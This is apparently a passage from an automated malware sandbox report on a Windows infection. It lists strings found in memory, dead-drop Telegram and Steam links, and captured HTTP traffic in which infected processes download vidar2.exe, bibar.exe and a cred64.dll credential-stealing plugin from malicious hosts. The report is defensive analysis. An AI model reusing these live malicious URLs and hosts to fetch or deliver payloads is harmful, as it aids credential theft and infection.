00000028.00000000.435504290.0000000000530000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://r3oidsofsios.com/
Source: explorer.exe, 00000011.00000000.405174014.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000012.00000002.775161398.0000000001090000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.413703435.0000000000EE0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000013.00000002.779312783.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.417309353.0000000000530000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.775858605.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.420551387.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000001A.00000002.780502207.0000000003377000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000000.426593885.0000000003450000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.429438818.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000026.00000000.432495432.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000026.00000002.777038253.0000000000650000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.435504290.0000000000530000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://r3oidsofsios.com/Mozilla/5.0
Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://search.aol.com/aol/search
Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://search.yahoo.com/search
Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.google.com/search
Source: 8F68.exe, 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199443972360
Source: 8F68.exe, 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: https://t.me/ttruelive
Source: 8F68.exe, 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: https://t.me/ttruelivehttps://steamcommunity.com/profiles/76561199443972360http://95.217.27.105:80hi
Source: unknown DNS traffic detected: queries for: r3oidsofsios.com
Source: C:\Users\user\AppData\Local\Temp\9545.exe Code function: 14_2_00DD42B0 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 14_2_00DD42B0
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /vidar2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kikangalaassociates.com
Source: global traffic HTTP traffic detected: GET /fusa/bibar.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 31.41.244.228
Source: global traffic HTTP traffic detected: GET /fb73jc3/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.79
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:50 GMTServer: Apache/2.4.41 (Ubuntu)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 37 34 66 65 0d 0a 2f 00 00 00 8f 3b 41 35 46 2c cf 62 b4 69 4c 7a ea be ee 06 5f 4c ee 8e a8 e1 af 06 13 a0 cc 71 e9 ea 11 2f 96 e3 88 cb 32 b7 9a 95 e1 3c f7 13 c7 f8 58 00 ca 74 02 00 1c ac 2b da 00 0b 07 00 09 00 34 00 00 01 54 b5 a6 04 fa 19 13 50 fe ad bf fe 50 01 0b 00 6b 6d 9b a1 be 47 6b 95 bb 2f 20 d4 c8 8f 3e f9 48 d9 5d 6d 65 6d 75 16 dc 93 04 9a 4e 3d 6e 00 a7 fb c4 e6 ba 10 81 4e de c9 81 63 bd 6b c1 21 12 08 03 82 92 b9 66 33 2c c4 d8 a4 26 81 d2 23 e6 f5 f0 39 01 b1 f6 c3 ff ed 03 02 bb a2 cb aa 25 f7 50 36 a5 43 cb 97 a8 89 2f 73 18 41 7c 38 c8 25 6c e3 2a 3c 5c 31 22 93 fa eb 08 47 0a cb 81 c7 f6 64 05 28 c2 6a 21 d2 ce 9f ad 76 7d 4a 1a d8 92 2f 8c 78 c6 24 f2 d6 cf 6b fb c5 e7 05 b0 1f 95 8d a2 26 fc ad 77 7d 1f 5b 65 2f 3f 20 47 56 ae f1 94 d8 e8 af 02 9c 35 87 be c3 a6 6b 91 75 5d 48 ac 3a 7e a2 d9 1c ad 62 4f e2 8d fa e3 a9 4d d6 02 65 2c a5 97 c6 61 03 59 fc 1d d4 88 16 72 64 45 ef 71 50 7d 98 6f 6e 3b 4c 4a 24 46 46 d2 e5 01 0f 29 c5 77 b5 91 d2 cf 70 47 4e 70 90 b9 1a e8 a3 c8 f4 35 b3 7d 94 47 eb 9e 1c 83 1b 9f 2b 04 01 20 1b 5d 82 c5 96 4e c0 54 3b 64 88 1b 82 ad a0 f7 12 e2 23 b3 67 bd 67 b8 6c d5 2e df 89 bb 99 b8 f8 a8 37 72 14 26 37 4c 36 33 93 ea 14 9f fc 79 88 6c 52 f9 4b a8 4b 79 72 fe 17 4a 97 56 fc 2c 49 19 fe ac 9b 63 57 59 57 b2 6d 42 86 48 71 26 85 c8 e9 46 b3 be 7d 6e 49 77 a0 bc d7 28 3b 4d 72 ba 0f 96 20 d8 e2 f0 06 2a 13 f4 31 f3 75 9d 49 ed a3 a9 16 2a be 8b 64 65 69 55 b5 88 be 3d 47 b3 fd d6 b1 69 98 52 de 77 cb ee 26 12 15 57 48 43 74 87 cc a7 87 b5 da 57 bd 62 db 5b 02 16 5b 43 da 83 e9 7d eb 69 ba cb 94 e0 d3 9c 36 d6 e8 5e 61 b8 d3 7c 0b 4f 5f d4 5f 20 84 6f 29 33 35 f8 06 1c 4b 74 4f 8b c3 37 09 e9 f0 3f 99 f4 29 aa d7 6c e4 9b 7d 8d 35 38 05 d8 ed 28 87 b4 7c 23 20 1a 4c 17 4f d3 f2 78 47 99 4d 46 4c ff 34 b5 cf ce 58 f4 58 6b ff 58 95 63 70 fe 45 7b 44 6a 9d 01 70 a4 96 d5 37 e9 53 35 1c ec 0d 77 3d 02 33 8a 5d 4f 02 f9 f2 29 23 5a ba c1 49 cd e4 b9 8f de 25 c8 51 82 ca ba 10 3a 0d e9 c9 3c 79 23 63 02 10 48 3f 91 d7 9d ee 95 29 de 70 a0 eb 9f 55 33 e8 17 3e 67 82 d3 5f 4a b1 d1 1c b2 35 6f e1 d4 36 68 1c b3 19 84 3c 49 ae 3a bf 98 c3 68 29 98 be f9 8d 66 0e 59 d3 88 1d a4 ea 06 bc 7f ab de 5a 8a 42 d8 ab 4a ed 7b 02 99 5f 31 df c6 ae 1b 3c a7 00 1c 42 02 01 1b 9b b8 5a 93 aa ba 49 d3 17 c5 0a f3 97 e0 63 f3 d1 e5 b9 41 bb 2a 06 24 ad af b9 25 17 3b f1 9b 84 1e ce 34 9c 3a 66 91 81 a2 ef 69 19 74 61 e8 33 37 39 af ed b1 65 c2 c3 f9 b0 fa f4 1c 64 c9 43 62 b0 fb e1 82 2e 1e ff a9 5b 8f 2c 06 1c 99 47 12 ba b9 cb de a6 fb 99 d6 48 4c ef 17 cd 38 c0 b1 f7 5c 4d 17 a5 55 86 f6 0f 6e 91 4f 16 df 22 08 2a 6e 37 d0 e4 00 c5 68 60 4a 30 1a 94 6b 3c 70 15 50 86 ac e2 b2 6c 59 c9 04 da 97 f7 61 7d 85 31 2d cb 9f 14 c0 72 fd 91 84 ff e6 9b 97 bb 1d 2c 7e fc 66 96 1e 85 41 67 5c 41 d7 d5 63 7c 55 a6 73 68 f1 7b 06 63
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:51 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:53 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:53 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:53 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:54 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:54 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:55 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:55 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 54Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e0 8a b3 f4 b8 1d 48 b0 d1 2a e6 e9 12 39 98 eb 92 f1 32 f0 83 9f b1 22 b7 4a 9a ae 1a 2e 91 76 49 8b Data Ascii: %S`Nh&WQY^H*92"J.vI
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:56 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 